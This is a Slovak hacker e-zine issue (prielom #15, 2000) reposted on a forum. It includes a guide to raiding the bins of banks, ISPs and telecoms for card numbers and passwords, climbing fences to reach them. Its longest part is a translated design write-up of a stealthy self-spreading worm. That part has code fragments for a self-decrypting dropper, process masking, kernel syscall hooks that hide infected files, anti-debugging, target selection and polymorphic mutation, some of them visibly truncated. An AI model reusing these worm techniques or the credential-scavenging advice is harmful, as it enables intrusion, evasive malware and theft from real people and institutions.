login::  password::




cwbe coordinatez:
1
102
617302

ABSOLUT
KYBERIA
permissions
you: r,
system: moderated
net: yes

neurons

stats|by_visit|by_K
source
tiamat
K|my_K|given_K
last
commanders
polls

node viewed 29680 times
total descendants::44
total children::19
2 K




show[ 2 | 3] flat


lubomier0
Vilozof0
Mittka0
igino.original0
zena v domac...0
robo0
e1m10
asebest0
aqwarel0
LDuck0
o-}}-]X[-{{-o0
cell0




00000001000001020061730200647819
maniac
 maniac      19.03.2004 - 15:02:50 [1K] , level: 1, UP   NEW

0000000100000102006173020064781901224830
maniac
 maniac      26.11.2004 - 14:22:17 , level: 2, UP   NEW
fuha toto tu jak vzniklo

000000010000010200617302006478190122483001348184
rejden
 rejden      20.01.2005 - 02:45:48 , level: 3, UP   NEW
takac~

00000001000001020061730200619273
pajkus
 pajkus      03.03.2004 - 13:41:14 , level: 1, UP   NEW

00000001000001020061730200619272
pajkus
 pajkus      03.03.2004 - 13:41:04 , level: 1, UP   NEW




::::::::::. :::::::.. :::.,:::::: ::: ... . :
`;;;```.;;;;;;;``;;;; ;;;;;;;'''' ;;; .;;;;;;;. ;;,. ;;;
`]]nnn]]' [[[,/[[[' [[[ [[cccc [[[ ,[[ [[,[[[[, ,[[[[,
$$$"" $$$$$$c $$$ $$"""" $$' $$$, $$$$$$$$$$$"$$$
888o 888b "88bo,888 888oo,__ o88oo,.__"888,_ _,88P888 Y88" 888o
YMMMb MMMM "W" MMM """"YUMMM""""YUMMM "YMMMMMP" MMM M' "MMM

prielom #15, 07.09.00 , prielom(at)hysteria.sk, http://hysteria.sk/prielom/





obsah


intro

trashdiving po slovensky

DOYOULOVEME??

bratislavsky heker a jeho manifesto

kybersaman [dokoncenie]

ako vykradnut banku

exploitovanie cez plt a got







intro



bingo, novy prielom.
po dlhsej odmlke sposobenej polrocnou drinou sme tu
zas. vlastne co to hovorim.. aka odmlka.. ked pouzivam terminy ako "oneskorenie", "odmlka"
a podobne, tak tym nechtiac navodzujem atmosku, akoze by mal prielom vychadzat povinne v
pravidelnych intervaloch.

hovno s makom

ak bude po tomto este dalsie cislo, berte to ako mile prekvapenie..


hysterka je totiz v stave existencnej krizy a s nou aj prielom. je na case decentne
zrusit dnesnu podobu hysterky este kym jej jednotlive casti (arxiv, prielom,
cZert...) tvorene v obdobi 1994-97 posobia "milo folklorne" a nie trapne detinsky.


myslim ze hysterka splnila svoj ciel - spojit ludi s podobnym konickom. mnoho projektov,
www stranok ci kamaratstiev priamo vzniklo v prostredi hysteria.sk, alebo ich
aspon hysterka ovplyvnila. ale moja snaha najst novych ludi ktori by krmili samotnu
hysterku novymi napadmi az, taku odozvu nenasla. server skapina hardverovymi problemami a
nedostatkom cerstveho obsahu.


priatelia a pribuzni pacienta... pripravte sa na najhorsie..


pajkus, 03.09.00, bratislava





trashdiving po slovensky


trashdiving (resp. trashing) - vyberanie smetnych kosov, ktore sa nachadzaju
pri rozlicnych instituciach, za ucelom ziskania zaujimavych informacii, je napr.
v usa velmi popularna cinnost. kazda kvalitnejsia session alebo con skonci
obvykle pri odpadkovych kosoch at&t alebo ma bell. v nasich stredoeuropskych
podmienkach je to vsak cinnost takmer vobec nepraktikovana, ak nepocitam mna a
par mne blizkych ludi, nepocul som o nikom, kto by sa nou zaoberal. co je vsak
urcite na skodu, pretoze trashovanie je proces nadovsetko zabavny.


na akciu (odporucam tak raz za 3-4 tyzdne) sa treba poriadne pripravit. zakladom
su rukavice, bez ktorych sa, ak nie ste naozajstni humusaci, nezaobidete. ale
nezabudnite ani na minimalne tri vacsie igelitove tasky, do ktorych vytrashovany
material nahadzete, obvykle ste v casovej tiesni. baterka taktiez nie je na
zahodenie, pretoze predsa len, trashovat za bieleho dna, to je prisilna kava aj
pre anarchistickejsich jedincov.


dalsou dolezitou castou je vyber institucii, ktorym sa hodlate pozriet na zubok.
toto vsak v nasich slovenskych ubohych podmienkach ani nemusite pripravovat
vopred, pretoze aj bratislava je malomesto, ktore sa da za jeden vecer v pohode
takmer kompletne obehat. treba sa zamerat najma na banky (mozny nalez vypisov z
uctov, na ktorych su cisla kreditnych kariet), internetovych providerov (obvykle
sa vytrashuju maximalne dialup hesla, niekedy sa postasti aj nejaky ftp alebo
telnet pass) a pravdaze telekomunikacie (mozne zaujimave info, manualy k
ustredniam, cisla na ustredne, hesla). fantazii sa medze nekladu, institucii je
dost, netreba sa obmedzovat. ide predsa o informacie a napr. zaujimave sumy sa
najdu aj za fondom narodneho majetku. to, ze tieto institucie skartovace takmer
vobec nepouzivaju, je u nas na slovensku samozrejmost. prinajhorsom je dokument
roztrhnuty na dve polovice.


ked uz sa nachadzate pri vyhliadnutej budove, obehnete si ju dookola a dufate,
ze najdete smetny kos, banky a vacsi provideri maju obvykle smetne kose dobre
skryte v svojom areali, resp. v podzemi, takze s tym sa mozete hned rozlucit, ak
nehodlate mat problemy s bezpecnostnou sluzbou. naproti tomu, telecom vas casto
nesklame. maju sice okolo svojho arealu nejaky provizorny mur alebo plot, avsak
vysoky akurat tak, ze sa da preskocit jednym tahom. celemu procesu to dodava
urcitu davku adrenalinu. mensi provideri sa casto nachadzaju v budovach spolocne
s inymi firmami a kancelariami, smetny kos je najcastejsie pred budovou na
hlavnej ulici. to je tiez celkom zaujimavy zazitok, ked okolo vas chodia ludia
a auta a vy sa hrabete v smetnom kosi. otvorte kos s odpadkami, pozrite, ci su
dnu papiere, ak ano, tak naberajte vsetko, co najrychlejsie ako mozete, pravdaze
v rukaviciach, do vopred pripravenych igelitovych tasiek. zajdite za roh na
nejake tmave miestecko a vsetko pekne pretriedte.


triedenie je zazitok sam o sebe. pri nakladani vsetkeho mozneho do igelitovych
tasiek sa nevyhnete aj rozlicnym nechcenym objektom. ked si myslite, ze obal od
cokolady je humus, tak triedenie prenechajte radsej niekomu inemu. este aj
zhnita bananova supka je slaby odvar oproti nedojedenemu kelimku od tresky,
v ktorom sa nachadza damska vlozka. nepytajte sa ma, co to robilo medzi
klientskymi zmluvami jedneho nemenovaneho providera.


necakajte od trashdivingu velke zazraky. sem tam najdete nejake to zaujimave
info, pri nutnej davke stastia aj par hesiel, ktore si pri troche sikovnosti a
vole, mozete zadovazit aj pomocou svojho unixoveho umenia. trashing je o niecom
inom. trashing je o akcii v terene, o adrenalinovom preskakovani plotov, o
hnusnom a odpornom humuse, co vam postupne prechadza cez ruky a o radosti z
toho, ze nakoniec z tych vsetkych sraciek ste vytiahli aj nieco uzitocne.
trashdiving je alternativna zabavka pre alternativnych ludi.



hromi, hromi(at)hysteria.sk


navrat na obsah




DOYOULOVEME??


po nedavnej afere s cervom ILOVEYOU, ktora otriasla hlavne medialnym svetom
isty pan zalewski (pre mnohych, ktori sleduju bugtraq nie neznamy) usudil, ze
nebude tak celkom od veci ludom ukazat, ze tento sposob nie je to, coho by sme
sa mali bat a publikoval v uz spominanej konferencii zaujimavy prispevok,
popisujuci projekt, na ktorom pracoval. odovodnil to slovami:


"media, podporovane altavista "expertmi", vykreslili apokalypticku viziu
destrukcie sposobenu hlupym m$ outlook/vbs cervom, nazvanym "ILOVEYOU". absurdne
odhady - 10 milionov dolarov vynalozenych na "odstranovanie skod", specialne
ked sa blizsie pozriete na rychlostou svetla rastuce hodnoty tychto spolocnosti
na trhu, pride mnohym ludom zle. trapna vbs aplikacia, ktora sama o sebe sa
nedokaze sirit bez luzerskej klikni-na-mna! interakcie a je limitovana na jeden
operacny system, urceny pre stolove pocitace... cerv, ktory posle sameho seba
ludom vo vasom e-mailovom adresari a vo svojej originalnej verzii znici mp3
subory na disku. a vy ho nazyvate nebezpecnym? prestante si robit srandu.."


uz davnejsie ho zaujimalo, ci je take tazke vytvorit naozaj nebezpecneho
internetoveho cerva, ktory by dokazal byt skodlivejsi ako znamy morrisov cerv
spred par rokov. spolu s par priatelmi svoj projekt nazvali "samhain". dali si
za ciel sedem kriterii, ktore musi splnat:


1: portovatelnost - cerv musi byt nezavisly na architekture a musi dokazat
existovat na rozlicnych operacnych systemoch (nielen unixoveho typu ale
i dos/win).
2: neviditelnost - cerv musi mat implementovane maskovacie techniky na skrytie
sameho seba v zijucom systeme a zostat neodhaleny tak dlho ako to len bude
mozne.
3: nezavislost - cerv sa musi dokazat sirit svojpomocne, bez akejkolvek
uzivatelskej interkacie, vyuzivajuc vstavanu databazu exploitov.
4: ucenlivost - cerv by mal byt schopny ucit sa nove exploitovacie techniky za
behu, vypustenim jedinej kopie upraveneho cerva si ostatne pomocou
specialneho komunikacneho kanalu (nazvyme ho wormnet) stiahnu dokonalejsiu
verziu.
5: integrita - jednotlivi cervi i cela struktura wormnetu by mala byt tazko
vypatratelna a upravitelna/zneskodnitelna. (sifrovanie, znackovanie)
6: polymorfnost - cerv by mal byt uplne polymorfny, so ziadnou konstantnou
castou kodu, kvoli zamedzeniu odhalenia.
7: pouzitelnost - cerv musi byt schopny realizovat zadane ciele - napr.
nainfikovat system, stiahnut si instrukcie a ked je misia ukoncena,
jednoducho sa zo vsetkych systemov vyparit.


na tychto siedmych principoch polozili celu svoju pracu, tento text opisuje
idey, koncepty a uryvky implementacie. v ziadnom pripadne nema sluzit ako
teroristicka prirucka a nebol zverejneny na to, aby pomohol ludom napisat ich
vlastny podobny kod. bol napisany preto, aby ukazal seriozne potencialne riziko,
ktoremu nemozeme virtualne zabranit alebo ho zastavit, nie je iba v cisto
hypotetickej rovine. casti kodu, ktore su zverejnene su iba zlomkove a casto
pochadzaju z ranych verzii.


"ale nezabudajte - funkcny model bol napisany. a ten je smrtelne nebezpecnym
mechanizmom, ktory moze byt pouzity na velmi zle veci. pravdepodobne sme neboli
prvi, ktori o tom premyslali a pokusili sa ho napisat. to je to, co nas
znepokojuje..."


"zima 1998, traja znudeni ludia kdesi v strednej europe. posadte sa a
relaxujte."


1: portabilita


toto je pravdepodobne najdolezitejsia vec - nechceme predsa kod, ktory bude
bezat iba na windowsoch, linuxe alebo solarise, alebo este horsie, ktory bude
schopny fungovat iba na x86 platforme. uloha ma jednoduche riesenie, ked sa
rozhodnete vytvorit kod v platformovo nezavislej forme. ako to moze byt
docielene? vacsina systemov ma prekladac jazyka c. tak mozeme sirit cerva vo
forme zdrojoveho kodu s jednoduchym desifratorom (povedzme, ze to bude shellovy
skript).


ale pockat, niektore (nie je ich tak vela) systemy nemaju prekladac cecka. co
mozeme v takejto situacii urobit? pouzitim wormnetu, cerv pocas infikacie moze
poziadat ostatnych clenov wormnetu o skompilovany binarny kod pre danu
platformu. detailnejsi popis wormnetu je v sekcii 4. i tak, binarka bude
obsahovat prilozeny zdrojovy kod na dalsie infekcie. popis fazy infikovania je
v sekcii 3.


prva verzia dekryptora vyzerala takto:


const char decryptor[]="#!/bin/bashnX=/tmp/.$RANDOM$$n(dd if="$0" of="
"$X.f~ ibs=1 skip=x01x01x01x01 count=x02x02x02x02x02x02 ;dd if="
""$0" of=$X.b~ ibs=x03x03x03x03x03 skip=1;echo "int x;main(int c,"
"char**v){char a[99999];int i=read(0,a,99999);for(;x<i;)a[x++]-=atoi(v[1]"
");write(1,a,i);}" >$X.d~;test -x /tmp/.a012382~||cc -x c $X.d~-o/tmp/."
"a012382~;/tmp/.a012382~ x04x04x04 $X.gz~;gzip -cd <$X.gz~>$X.c"
"~;rm -f $X.f~ $X.d~;cc -O3 -x c $X.c~ -o $X~;chmod 755 /tmp/.a012382~)&>"
"/dev/null;test -x "$0"&&exec $X~ "$0" $@n";


pouziva velmi jednoduchu (po bajtoch sa avysujucu) "enkrypciu" zdrojoveho
kodu so specifickou inkrementalnou hodnotou (dekryptor sa modifikuje v
zavislosti od zvolenej hodnoty - x01, x02, x03 a x04 sa menia sifrovacou
rutinou). tak isto, tento konstantny dekryptor je kazdy raz prepisany za
pouzitia jednoducheho polymorfneho mechanizmu (sekcia 6) aby sa vyvaroval
konstantnych retazcov. neskor sme modifikovali enkrypcnu rutinu na nieco
o trochu silnejsie - v skratke, iba robi ovela zlozitejsie odhalenie cerva
v neaktivnej forme.


ako mozete vidiet, tento dekryptor (alebo jeho rana verzia ukazana vyssie) nie
je prilis portovateny - co ak nemame bash, prekladacm gzip alebo podobne
utilitky? to bol jeden z dovodov, preco sme sa rozhodli spojit cervy do
wormnetu - ak sa vyslany kod nespoji spat k materskej kopii a neoznami svoju
cinnost, ciel nie je oznaceny za infikovany a wormnet je poziadany o
predkompilovanu binarku pre danu architekturu (za predokladu, ze uz tato
architektura bola nekde na svete infikovana).


sebastian napisal virovy kod, ktory bol schopny sa sirit na win/dos platforme
s c-prekladacom a unixovych systemoch bez akejkolvek modifikacie alebo
interkacie. instaloval sameho seba ako trojskeho kona do prekladaca (modifikoval
vkladane hlavickove subory, aby vlozil svoje instrukcie do kazdej skompilovanej
binarky). vola sa califax a bol vyvinuty pocas prac na projekte samhain ako
cvicenie na ukazku, ze taketo medziplatformove skoky su mozne. nechcem pouzivat
sebastianove zdrojove kody bez jeho povolenia, vsetko co som tym chcel povedat
je, ze to spravil na menej ako 415 riadkov kodu. califax nebol nijako spojeny s
projektom sahain, pretoze sme nechceli infikovat winbloze z ideologickych
dovodov :P


2: neviditelnost


po naburani systemu, cerv nemusi vzdy dosiahnut rootovske prava, takze prvorade
je implementovat techniky, ktore by boli schopne ho zamaskovat, vydavat za iny
proces v systeme a stazit zneskodnenie pokym je sanca ziskat vyssie privilegia
(detaily v sekcii 3). takisto sme sa zhodli, ze by bolo dobre, aby sa tazko
debugoval/krokoval cerv aj v neaktivnom stave - v sekcii 5 najdete podrobnosti
o anti-debugovacich technikach.


nas maskovaci kod pre neprivilegovany rezim pozostava z nasledujucich casti:


maskovanie: prejde si /proc, vyberie mena najcastejsie beziacich procesov
a zmeni svoje meno tak, aby vyzeral ako jeden z nich,
cyklicky sa opakujuce zmeny: menit svoje meno (takisto aj nazov suboru) spolu
s pid tak casto ako sa len da, vzdy mat vytvoreny zrkadlovy proces v ocakavani
moznosti zabitia rodicovskeho alebo dcerskeho procesu sikovnejsimi utilitkami.


nas ciel bolo docielit, aby bolo takmer nemozne (s beznymi nastrojmi) "chytit"
proces samotny, vseky /proc parametre (pid, exe name, argv[0]) sa menia a i ked
je jeden z nich dostinuty, mame zrkadlovy proces. nasledujuci komentar pochadza
z README libworm pre unixove systemy:


-- odstrihnute z README --

a) anti-skenovacie rutiny

nasledujuce rutiny su urcene na odhalenie "anti-cervej techniky", ako napriklad
kill2, pripadne hocico ine, prefikanejsie. pouzivaju sa pred volanim fork():

int bscan(int lifetime);

bscan robi "povrchne skenovanie" za pouzitia iba dvoch dcerskych procesov.
zivotnost moze byt nastavena na hodnoty okolo 1000 mikrosekund. navratove
hodnoty:
0 - ziadne anti-cervie techniky neboli zistene, pouzit ascan alebo wscan.
1 - primitivne techniky zistene (ako "kill2"), pouzit kill2fork()
2 - prefikane (alebo hrube) techniky odhalene, trpezlivo pockat

int ascan(int childs,int lifetime);

ascan produkuje "vyspelejsie skenovanie" pouzivajuc dany pocet dcerskych
procesov (hodnoty medzi 2 a 5 su postacujuce). testuje prostredie
vykonstruovanim falosneho utoku forkbombou. vysledky su ovela presnejsie:
0 - ziadne anti-cervie techniky nezistene, pouzit wscan.
1 - anti-cervie utility v operacnom rezime.

int wscan(int childs,int lifetime);

wscan funguje podobne ako ascan ale pouziva system "chodiaceho procesu".
vyzera chybovo, vzdy vracia '1' bez akehokolvek dovodu ale je to taktiez
najlepsia odhalovacia technika. navratove hodnoty:
0 - ziadne anti-cervie techniky nezistene.
1 - beziace anti-cervie utility.

int kill2fork();

toto je alternativna verzia volania fork(), navrhnuta na oklamanie hlupeho
anti-cervieho programoveho vybavenia (pouzije sa, ked bscan vrati 1).
navratova hodnota: taka ako fork().

b) maskovacie rutiny

nasledujuce rutiny su navrhnute za ucelom maskovania a skrytia aktualneho
procesu:

int collect_names(int how_many);

collect_names vytvori tabulku s poctom zaznamov "how_many". tato (pristupuje
sa k nej cez "cmdlines[]" rozhranie) obsahuje mena procesov v systeme.
navratova hodnota: pocet zozbieranych procesov.

void free_names();

tato funkcia uvolni miesto alokovane funkciou collect_names ked uz viac nie je
potrebne vyuzivat cmdlines[].

int get_real_name(char* buf, int cap);

ziskame nou skutocne meno spustitelnej binarky pre aktualny proces do buf
(kde cap znamena maximalnu dlzku)

int set_name_and_loop_to_main(char* newname,char* newexec);

tato funkcia zmeni viditelne meno procesu na nove (moze byt zvolene pomocou
cmdlines[]), potom zmeni meno binarky na "newexec" a vrati sa na zaciatok
funkcie main(). nezmeni pid. ak je "newexec" NULL, binarka sa nepremenuje.
navratova hodnota: nenulova, ak nastane chyba.

poznamka: premenne, stack a vsetko ostatne sa zresetuje. treba pouzit iny
sposob (rury, subory, mena suborov, mena procesov) na vymenu dat zo starej
binarky do novej.

int zero_loop(char* a0);

tato funkcia vracia 1 ak je main() dosiahnuta prvy krat alebo 0, ak uz bola
pouzita set_name_and_loop_to_main(). argv[0] je vkladany ako parameter. iba
jednoducho skontroluje, ci real_exec_name prezentuje argv[0].

-- EOF --

tieto rutiny su relativne slabe a pouiztelne iba na kratkodobe skryvanie
procesov. cielom je cim skor ziskat rootovske privilegia (opat diskutovane
neskor). potom dosiahneme ziadaneho vysledku. pokrocile skryvanie procesov
je vysoko zavisle od systemu, obvykle riesene cez sledovanie systemovych volani.
vytvorili sme zdrojove kody pre univerzalne moduly urcene na skryvanie na zopar
systemoch, avsak nie su funkcne na vsetkych platformach, ktore je samhain
schopny napadnut. techniky tu pouzite su zalozene na dobre znamom principe
ukrytych modulov.


nas linux 2.0/2.1 (2.2 a 2.3 jadra v tom case este neboli zname), modul vyuziva
techniku popisanu neskor v prispevku nazvanom "abtrom", ktory sa objavil v
bugtraqu od 28. augusta 1999, sledovanie systemovych volani.
sebastian napisal skryvacie techniky v zavislosti na suboroch (na vracanie
povodneho obsahu infikovanych suborov), pokial som ja vyvinul techniky na
ukryvanie procesov a interface cerva. modul sledoval volania open, lseek,
llseek, mmap, fstat, stat, lstat, kill, ptrace, close, read, unlink, write
a execve.


na ukazkum nove volanie llseek moze vyzerat takto:


int new_llseek(unsigned int fd,unsigned int offset_high,
unsigned int offset_low,int *result,unsigned int whence) {
retval=old_llseek(fd,offset_high,offset_low,result,whence);
if (retvalfiles->fd[fd])) return retval;
if (S_ISREG(file->f_inode->i_mode) || S_ISLNK(file->f_inode->i_mode))
if (is_happy(fd) && file->f_pos < SAMLEN) file->f_pos += SAMLEN;
return retval;
}

v tomto pripade sme chceli vynechat kod loaderu samhain na zaciatku suboru.
funkcia is_happy() sa pouziva na identifikaciu infikovanych suborov.
nanestastie, musi tiez overovat dlzku loaderu - nezabudajte, je dynamicky
generovany. toto je cast kodu z is_happy() pouzita na zistenie tejto dlzky
z nasej rutiny dekryptora:


// Determine where ELF starts...
file->f_pos=0;
BEGIN_KMEM
r=file->f_op->read(file->f_inode, file, buf,sizeof(buf));
END_KMEM
// Groah! We have to write out own atoi... Stupido ;-)
znaki=0;
while (znaki!=TH && ++v0) {
BEGIN_KMEM
read(x,b,1);
END_KMEM
close(x);
if (!b[0]) return -ESRCH;
}
return old_ptrace(req,pid,addr,dat);
}


takisto musime ukryt sietove spojenia wormnetu a poslanych / prijatych paketov
wormnetu, aby sme sa vyhli odhaleniu pomocou tcpdump, sniffit atd.


to je vsetko, nic nezname. podobny kod bol napisany pre par inych platforiem.
pozrite si napr. afharm alebo sebastianove Adore moduly pre nazornu ukazku
implementacie skryvacich technik.


3: nezavislost + 4: ucenlivost


wormnet. magicke slovo. wormnet je vyuzivany na distribuovanie upgradnuteho
kodu, modulov (napr. nove exploity) a na vzajomnu komunikaciu cervov pri
ziadostiach o predkompilovanu binarnu formu. komunikacna schema skutocne nie je
az taka zlozita, pouzivaju sa tcp streamy a broadcast spravy v nich. spojenie
nie je stale. samhain vyuziva styri druhy ziadosti:


vyrozumenie o infekcii: vytvori sa spojenie so svojim materskym cervom ak
infekcia prebehne uspesne (ziadne spojenie = zlyhanie)
ziadost o obnovenie: dosiahne sa opatovnym infikovanim systemu (v tomto
pripade uz zahniezdeny worm verifikuje podpis na novo prichadzajucom cervovi,
a ak je binarka novsieho data, pomocou execve() vymeni beziaci proces), potom
posle svojim dcerskym cervom informaciu obsahujucu casove informacie o novej
verzii.
potvrdenie obnovenia: ak je casova informacia navratena po ziadosti novsia ako
aktualne beziaceho cerva, moze tuto informaciu potvrdit a stiahnut si novu
verziu cez ten isty tcp stream. potom by si mal overit podpis kodu, a
eventuelne vymenit beziaci proces novym, potom poslat informaciu dalsim cervom
nizsie polozenymi v hierarchickej strukture wormnetu.
ziadost o binarny kod pre danu platformu: poslanim ziadosti vsetkym spojenym
cervom (pouzity je ttl mechanizmus) s popisom typu platfomy, systemu a verzie,
tak isto aj ip adresy a specifikacie portu. tato ziadost je poslana (so
znizenym ttl) ostatnym cervom, sposobujuca wormnet broadcast, prvy cerv, ktory
moze poskytnut pozadovany binarny kod, odpoveda pripojenim k cielovemu hostu
na specifikovany port a cerv, ktory vyslal ziadost, spojenie akceptuje (iba
raz). akekolvek dalsie ziadosti o pripojenie (moze sa stat, pokym nevyprsi
ttl) budu autmaticky odmietnute. po spojeni sa posle vhodna binarka, ktora
je prijata infekcnymi rutinami. cerv posle ziadost s ttl priblizne 5, neskor,
pri zlyhani, moze poslat dalsie, ktore zvysuje o 5 a bude sa pokusat 3-5 krat,
nemali sme ziaden napad ohladne optimalnych hodnot.


pakety su "kryptovane" (opat, nic silne) klucom priradenym specifickemu spojeniu
(generovane z materskej ip adresy, ktoru cerv ziska pri infekcii). typ je
popisany jedno-bitovym polom, nasleduju ho infomracia o velkosti a data alebo
retazce ukoncene nulovym znakom, pripadne i ttl/casove informacie (zalezi od
typu spravy).


struktura spojeni wormnetu moze vyzerat lubovolne a je limitovana iba poctom
spojeni na jedneho cerva. spojenia su iniciovane od dcerskeho procesu smerom
k materskemu, obvykle obchadzajuc firewally a maskaradovaci softver.


pri infekcii sa dcerskemu procesu vygeneruje kratky zoznam predchadzajucich
materskych procesov. ak uz matersky proces obsluhuje prilis vela spojeni v danom
case, novy proces sa spoji s inym cervom zo zoznamu.


3
|
|
3 ----- 2 ---- 3 ----- 4 ------- 5 ------- 6
| / | |
| / | |
| / | | mozna struktura wormnetu.
1 ------------ 2 ----- 3 6 cisla reprezentuju poradie,
/ v akom boli hostitelia
/ infikovani. vyznaceny host "3"
/ sa z nejakeho dovodu nemohol
---- 3 ------ 4 spojit so svojim materskym
| procesom, preto nadviazal
| spojenie s hostom "1", ktoreho
| mal poznaceneho v zozname.
4


ok, poviete si, a co exploity? exploity su modularne (pripojene k telu cerva)
a rozdelene do dvoch kategorii - lokalne a remotne. chceme byt nezavisli na
platforme, tak prihliadame na chyby filesystemu, chyby ako napriklad -xkbdir
v xwindows a vlozime len zopar buffer overflowov, hlavne pre remote pristup
(ale rozhodli sme sa pouzit aj par chyb ako remote pine mailcap exploit a
podobne...kod je naozaj majstrovskym kusom shelloveho skriptu :)


obidva typy, aj remote aj lokalne exploity su zoradene podla ucinnosti.
exploity, ktore maju najvyssiu uspesnost sa skusaju ako prve, menej ucinne
sa presuvaju na koniec. tento zoznam dcerske procesy dedia.


ah, sirenie. obete su volene pomocou monitorovania aktivnych sietovych
spojeni. servery sa vyberu nahodne z tohto zoznamu a cerv sa ich pokusi
napadnut. v pripade uspechu je server zaradeny do zoznamu uspesne napadnutych
hostov a uz nie je viac napadany. v pripade neuspechu sa cerv nepokusa o dalsi
vypad az pokym sa neobjavi nova, vylepsena verzia. samozrejme, interny zoznam
je konecny a obcas sa moze stat, ze server je napadnuty znovu (ak to nie je
nas potomok a nie je prave napojeny) ale koho to trapi - pokus bude ignorovany
alebo prebehne upgrade, v zavislosti na casovych znackach.


tento kod je pouzity na ziskanie dalsieho ciela (zo zoznamu aktivnych spojeni)


void infect_host(int addr) {
struct hostent* h;
int (*exp)(char*);
int i=0,n=0,max=VERY_SMALL;
if ((0x7F & addr)==0x7F) return; // vynechaj 127.* subnet :-)
h=gethostbyaddr((void*)&addr,4,AF_INET);
if (is_host_happy(h->h_name)) return; // vo wormnete?
for (i=0;remote[i].present;i++) remote[i].used=0;
while ((max=VERY_SMALL)) {
n=-1;
for (i=0;remote[i].present;i++)
if (!remote[i].used && remote[i].hits>=max) { max=remote[i].hits;n=i; }
if (nh_name));
if (i>0) break;
}
}


5: integrita


najdolezitejsou vecou v zivote cerva je nedat sa chytit. chceme si byt isti, ze
nie je lahke nas vystopovat/debugovat - chceme urobit reverzne inzinierstvo co
najtazsim. nechceme ukazat nase interne protokoly wormnetu, komunikaciu s
modulom v jadre a detekcne techniky pouzivane samotnymi cervami na kontrolovanie
samych seba navzajom, atd. styri veci:


skryt vsetko: pozri sekciu 2
hashovat, kryptovat, bit sa: pozri sekcie 1 a 4
nenechat sa chytit: sekcia 2
znemoznit debugovanie i v pripade, ze sa nemozeme skryt!


pouzili sme zopar anti-debugovacich technik, vratane chyb zavislych na
aplikaciach (chyby v strace pri zobrazovani niektorych vadnych parametrov pri
systemovych volaniach, chyby v gdb pri parsovani elf hlaviciek, obchadzanie
ramcovych pointrov, samomodifikujuci sa kod a tak dalej), ako aj zopar
univerzalnych anti-debugovacich rutin, ktore su volane dost casto (nie su
narocne na cas). toto je jedna z nich:


void kill_debug(void) {
int x,n;
n=getppid();
if (!(x=fork())) {
x=getppid();
if (ptrace(PTRACE_ATTACH,x,0,0)) {
fprintf(stderr,
"nnn**************************************n"
"*** NAOZAJ SA NECHCEM DAT STOPOVAT ***n"
"**************************************nnn");
ptrace(PTRACE_ATTACH,n,0,0);
kill(x,9);
}
usleep(1000);
ptrace(PTRACE_DETACH,x,0,0);
exit(0);
}
waitpid(x,&n,0);
return;
}


ako som uz povedal, cervie moduly su podpisane. najprv su pouzite jednoduche
podpisy, neskor pouzivaju jednoduchy system privatnych klucov (naozaj nic tazke,
co by sa nedalo cracknut, kluc je relativne kratky ale je to dostatocne zlozite
pre amaterov) tymto je zabezpecene, ze nahradzame nasho cerva skutocncym cervom,
nie podvrhnutyn zabijakom.


6: polymorfizmus


polymorfny mechanizmus je v podstate jednoduchy - navrhnuty na to, aby sme si
mohli byt isti, ze nas dekryptor bude vzdy iny. kedze je napisany ako shellovy
skript, je velmi lahke pridat par matucich prikazov, vlozit prazdne premenne,
vlozit alebo nahradit niektore casti uz deklarovanymi $PREMENNYMI_SHELLU.
ziskat spat povodny obsah nie je jednoduche ale vsetko co potrebujeme je
imitovat parsovanie dekryptoru - a mame povodny kod.


pridavanie do dekryptoru moze vyzerat takto:


while (decryptor[x]) {
switch (decryptor[x]) {
case ' ':
if (!rnd(2)) buf[y++]=' '; else goto difolt;
break;
case 'n':
if (!you_can) you_can=1;
default:
difolt:
if ((you_can && you_can++>1) && !rnd(10) && decryptor[x]>5 &&
decryptor[x]!='>' && decryptor[x]!='2) {
buf[y++]='\';buf[y++]=10;norm=0;
} else {buf[y++]=decryptor[x++];norm++;}
}
}


7: pouzitelnost


je nahluple vypustit cerva navrhnuteho napriklad na kradnutie tajnych informacii
zo specifickeho hostitela, pretoze nemame ziadnu istotu, ze bude fungovat naozaj
spravne a nebude polapeny. ak ano, moze byt debugovany (ne spraveny tak, aby sa
dallen velmi tazko, ale ako kazdy program, nie je nemozne to urobit, specialne
ak sa vam podari ziskat separovany kod cerva). namiesto toho mozeme vypustit
neskodneho cerva, potom, ked sa uistime, ze dosiahol zaujimavych hostitelov a
doteraz nebol chyteny, mozeme rozoslat upraveneho noveho cerva, ktory bude
obsahovat nas zaskodnicky kod. ten sa bude snazit dosiahnut vsetky cervy vo
wormnete a upravi ich podla seba.


mozno to nie je najlepsie riesenie ale je to urcite ovela viac bezpecnejsie ako
standardne vkladat zadne vratka.


8: a co sa stalo potom?


tak to je on, projekt samhain, ktory sa zmestil do priblizne 40 kb kodu. co sa
s nim stalo? nic. nikdy nebol vypusteny a nikdy neboli odstranene obmedzenia
z rutin lookup_victim() a infect_host(). stale lezi na mojom disku, usadza sa
na nom prach a OBLIVION a to je presne to, co sme chceli.


prestal som vyvijat a testovat novy kod v januari 1999, vo verzii 2.2 a pri
priblizne 10 000 riadkoch kodu. wojtek bojdol vyvijal jeho ovela lepsie
premysleny wormnet a system infekcie/monitorovania do februara alebo marca, ale
nikdy som nenasiel dostatok casu spojit jeho zdrojove kody s povodnymi. potom
sme odstranili nas archiv zo serveru s pristupom zo siete, ktory sme pouzivali
na vymenu napadov. neskor som publikoval par chyb pouzivanych v databazi
exploitov v bugtraqu, niektore (hlavne tie, ktore som neobjavil ja) sme si
nechali pre seba.


pribeh sa skoncil. az do dalsieho dazdiveho dna, dalsich troch znudenych
hackerov. mozete si byt isti, ze sa to stane. jedina vec, ktorou si byt isti
nemozete je koniec dalsieho pribehu.






nechcem sa hrat na proroka alebo jasnovidca, ale dovolim si tvrdit, ze
takyto scenar sa mozno uz coskoro stane realitou. ludia nechcu byt v bezpeci,
nikdy nebudu dostatocne prihliadat na skutocne fakty. hackli nas? ale, ved sa
tolko nestalo, ututlat.. distribuovane utoky? kazdy sa citi bezpecne ale je to
klamliva bezpecnost. citia sa spokojni ale veci sa deju, to ze si to niekto
nevsimne neznamena, ze je vsetko v poriadku..


ved si len skuste na svojich "bezpecnych" serveroch spravit: find /dev -type f
a kludne sa stavim, ze kvantum z vas bude velmi nemilo prekvapenych. ale to je
len vrchol ladovca. to, co najdete, su len nevinne hracky pre deti..


este bude veselo.



autor: michal zalewski, lcamtuf(at)tpi.pl

preklad, uprava: salo


navrat na obsah




bratislavsky heker a jeho manifesto


povedaly mi, abi som napysal clanok o sebe do tohto casopysu "zlom". tak tu vam
teda o sebe pysem. aha ale este nieco: ak chcete bit taky dobri ako ja, musyte
vela hekovat a musite byt strasne inteligentny.


